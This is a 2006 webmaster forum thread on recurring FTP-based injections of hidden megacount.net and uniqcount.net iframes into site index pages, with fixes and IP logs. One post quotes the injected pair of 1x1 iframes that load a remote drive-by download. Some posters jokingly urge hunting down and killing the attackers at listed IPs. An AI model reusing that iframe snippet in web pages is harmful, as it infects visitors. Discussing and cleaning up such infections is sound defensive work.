SOLUTION: Trojans uniqcount.net, megacount.net, etc

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Naughty-Pages
    Confirmed User
    • Oct 2006
    • 4533

    #1

    SOLUTION: Trojans uniqcount.net, megacount.net, etc

    Rather than posting this in everyone of the countless threads about the problem, I figured it was best to start a new thread with the solution.

    It took me forever, but I "think" I?ve figured this out, they'd been hacking a couple of my sites roughly every other day with that same uniqcount.net code and also with megacount.net as well. (And a few other webmasters I am associated with).

    I say "think" because I know how they are doing it (FTP) but I am not certain how they gained the password, so for now it's a partial solution.

    Anywhoo, I enabled all of my logs and was checking them each time my site was hacked, but there was absolutely nothing to indicate how they were inserting the code into my index page.. I had removed all unnecessary scripts, updated scripts, you name it, but they were still changing the file. I had cross checked the webmasters sites on this forum plus others that I knew were having this issue, but there were no real similarities other than cPanel.

    Then today after it was hacked I looked at my FTP log and BAM, they downloaded the index page and then quickly re-uploaded it. And the phucknut used his own IP address LOL, so after I sent the log to his ISP, he's probably gonna be looking for a new service provider LMAO!

    For now I?ve changed my cpanel pass and my ftp pass, and I also went to:
    FTP Manager -----> Anonymous FTP Controls (or Setup Anonymous FTP Access) and unchecked "Allow anonymous access to <yoursite.com>"

    But what bothers me is that my cpanel/ftp pass was strong to begin with (random upper/lower case plus numbers).

    There MUST be some security hole somewhere that allowed them to get that pass, because it would have been nearly impossible to Brute Force. If anyone has any ideas how they could get this pass, let us know.

    FYI:
    I wanted to join in on the conversation here when I was trying to figure out how they were doing it, but a few users seemed to be a little too ignorant for my tastes. i.e.:
    (not meant as a flame, ignorant means uneducated on a subject, if I had wanted to flame I'd have said stupid LOL)

    I mean here:
    w ww.gofuckyourself.com/showthread.php?t=658360
    this dude think that a webmaster would intentionally infect his own site LMFAO!! ya, great way to do business!!

    and here:
    w ww.gofuckyourself.com/showthread.php?p=10946872#post10946872
    w ww.gofuckyourself.com/showthread.php?p=10949238#post10949238

    (A guy's asking for help, but apparently this dude doesn't understand that, comments like his make it kind of difficult to engage in productive conversation)

    (it also makes it more difficult to figure out the situation when the code is censored out of a post...)

    and there are a dozen other threads out there about this, but for some reason there's always someone who thinks these webmasters are putting this code on their site themselves... LOL
  • SmokeyTheBear
    ►SouthOfHeaven
    • Jun 2004
    • 28609

    #2
    im pretty sure cpanel has open local access exploits..

    but they would already need to be on your same server to get your pass..

    heres one possible thing, could be hacking in using another account ( or have an account with your host ) then once ther in they get everyone's account pass's.

    If this is the case there should be other victims on your shared box..
    hatisblack at yahoo.com

    Comment

    • Naughty-Pages
      Confirmed User
      • Oct 2006
      • 4533

      #3
      I have a dedicated server.

      I've got over 40 sites on the same box, but they are spread out over different ip address/cpanel accounts.

      There were 2 other sites on that server that were getting the index pages hacked months ago with a similar trojan, but nothing has happened to them since I upgrade my phbb forums (those 2 had phbb, this last site did not). And those 2 had different IP Addresses, the IP Address that this site has only has 2 other domains on it, but neither of those have ever been hit.

      Also there were links in another thread about cPanel security holes, but the one was for versions 10.8 and earlier, I use 10.9.0-RELEASE 44

      Comment

      • SmokeyTheBear
        ►SouthOfHeaven
        • Jun 2004
        • 28609

        #4
        prob when you got hacked before they installed a rootkit..
        hatisblack at yahoo.com

        Comment

        • Violetta
          Affiliate
          • Jul 2004
          • 28735

          #5
          I have had trouble with that megacount shit too... This is what my host told me:

          I've noticed that file was changed via FTP from IP
          83.108.199.188. I've reset your ftp password to
          xxxx.


          If anyone wants to check whatever that ip is, go ahead! Im not sure how to. I am just glad my problems seems to be gone
          M&A Queen

          Comment

          • detoxed
            vip member
            • Jan 2003
            • 17798

            #6
            Why doesnt someone track this person down and kill them? Simplest solution out there.

            Comment

            • Violetta
              Affiliate
              • Jul 2004
              • 28735

              #7
              Originally posted by detoxed
              Why doesnt someone track this person down and kill them? Simplest solution out there.
              Feel free to use that IP I just posted and HUNT down the MOTHErFUCKER! Lets go to war...
              M&A Queen

              Comment

              • SinSational
                Confirmed User
                • Oct 2004
                • 1723

                #8
                i did a summary thread about this a couple weeks ago. it is not soley cPanel related.
                feel free to post in this thread.

                http://www.gofuckyourself.com/showthread.php?t=664411

                ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                Virtual from $14.95/month, Dedicated from $149.95/month
                Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                Comment

                • Violetta
                  Affiliate
                  • Jul 2004
                  • 28735

                  #9
                  bump......
                  M&A Queen

                  Comment

                  • RawAlex
                    So Fucking Banned
                    • Oct 2003
                    • 9465

                    #10
                    10/15/06 15:45:37 dns 83.108.199.188
                    nslookup 83.108.199.188
                    Canonical name: ti400720a080-1980.bb.online.no
                    Addresses:
                    83.108.199.188

                    Comment

                    • Naughty-Pages
                      Confirmed User
                      • Oct 2006
                      • 4533

                      #11
                      Originally posted by detoxed
                      Why doesnt someone track this person down and kill them? Simplest solution out there.
                      because it's more than one person LOL

                      here, hunt these guys down and kill them:
                      12.214.244.180
                      69.224.1.115
                      24.7.23.229 -already reported to ISP
                      67.186.91.140
                      67.160.69.37
                      75.28.67.51
                      68.4.29.182
                      70.134.141.27
                      71.10.166.18
                      67.174.122.223
                      70.130.59.229
                      24.50.187.224

                      most of these are real ip addies, kinda hard to use a proxy with ftp i am guessing LOL

                      Comment

                      • BSleazy
                        Confirmed User
                        • Aug 2002
                        • 6721

                        #12
                        So how do I get this fucking megacount off my wordpress blogs? It's freazing them and takes like 2 minutes to load then pops up some download.

                        this is at the top of the source code

                        <iframe src='http://megacount.net/adv/168/new.php' width=1 height=1></iframe><iframe src='http://megacount.net/adv/new.php?adv=168' width=1 height=1></iframe>
                        icq 156131086

                        Comment

                        • Violetta
                          Affiliate
                          • Jul 2004
                          • 28735

                          #13
                          Originally posted by BCyber
                          So how do I get this fucking megacount off my wordpress blogs? It's freazing them and takes like 2 minutes to load then pops up some download.

                          this is at the top of the source code

                          <iframe src='http://megacount.net/adv/168/new.php' width=1 height=1></iframe><iframe src='http://megacount.net/adv/new.php?adv=168' width=1 height=1></iframe>
                          Upload and overwrite the wordpress file wp-content/themes/default/index.php

                          That is if you are using the default theme! If you are using another one, do it to that folder...

                          And change your login password... If you are using admin as login name and some easy password, these may have been bruteforced! Change password to your ftp server too!
                          M&A Queen

                          Comment

                          • BSleazy
                            Confirmed User
                            • Aug 2002
                            • 6721

                            #14
                            That didn't work.
                            icq 156131086

                            Comment

                            • Violetta
                              Affiliate
                              • Jul 2004
                              • 28735

                              #15
                              Originally posted by BCyber
                              That didn't work.
                              Try again... find the file! Just do some backup, try to find the file with another filesize
                              M&A Queen

                              Comment

                              • BSleazy
                                Confirmed User
                                • Aug 2002
                                • 6721

                                #16
                                Originally posted by Rockatansky
                                Try again... find the file! Just do some backup, try to find the file with another filesize
                                Replacing the theme files didn't help but the root wordpress files did the job.
                                icq 156131086

                                Comment

                                • Machete_
                                  WINNING!
                                  • Oct 2002
                                  • 14579

                                  #17
                                  Originally posted by Naughty-Pages
                                  because it's more than one person LOL

                                  here, hunt these guys down and kill them:
                                  12.214.244.180
                                  69.224.1.115
                                  24.7.23.229 -already reported to ISP
                                  67.186.91.140
                                  67.160.69.37
                                  75.28.67.51
                                  68.4.29.182
                                  70.134.141.27
                                  71.10.166.18
                                  67.174.122.223
                                  70.130.59.229
                                  24.50.187.224

                                  most of these are real ip addies, kinda hard to use a proxy with ftp i am guessing LOL

                                  First you infect a stupid users PC with a trojan, install a proxy on it - axecute your hacking through his proxy...

                                  Comment

                                  • biftek
                                    So Fucking Banned
                                    • Jan 2005
                                    • 1030

                                    #18
                                    ftp'ing via a proxy is no different then browsing via a proxy

                                    Comment

                                    • Sosa
                                      In Tushy Land
                                      • Oct 2002
                                      • 40149

                                      #19
                                      I just noticed in the last week pretty much the same thing happening to a few domains of mine. I delete the code from the index page and later on it appears again. Hope the host can figure out something.

                                      Comment

                                      • Naughty-Pages
                                        Confirmed User
                                        • Oct 2006
                                        • 4533

                                        #20
                                        Originally posted by biftek
                                        ftp'ing via a proxy is no different then browsing via a proxy
                                        I was being sarcastic.., (hence the "LOL")

                                        odds are there's some hacking forum that allow n00bs access to this sploit.. n00bs not quite bright enough to use a proxy. LOL
                                        Last edited by Naughty-Pages; 10-21-2006, 04:22 AM. Reason: addition

                                        Comment

                                        • bigalownz
                                          Confirmed User
                                          • Aug 2005
                                          • 1657

                                          #21
                                          just a question what type of servers are geting hacked

                                          windows or Linux ??

                                          and what stats software is on them ???
                                          $100 free credit for all hosting needs

                                          Comment

                                          Working...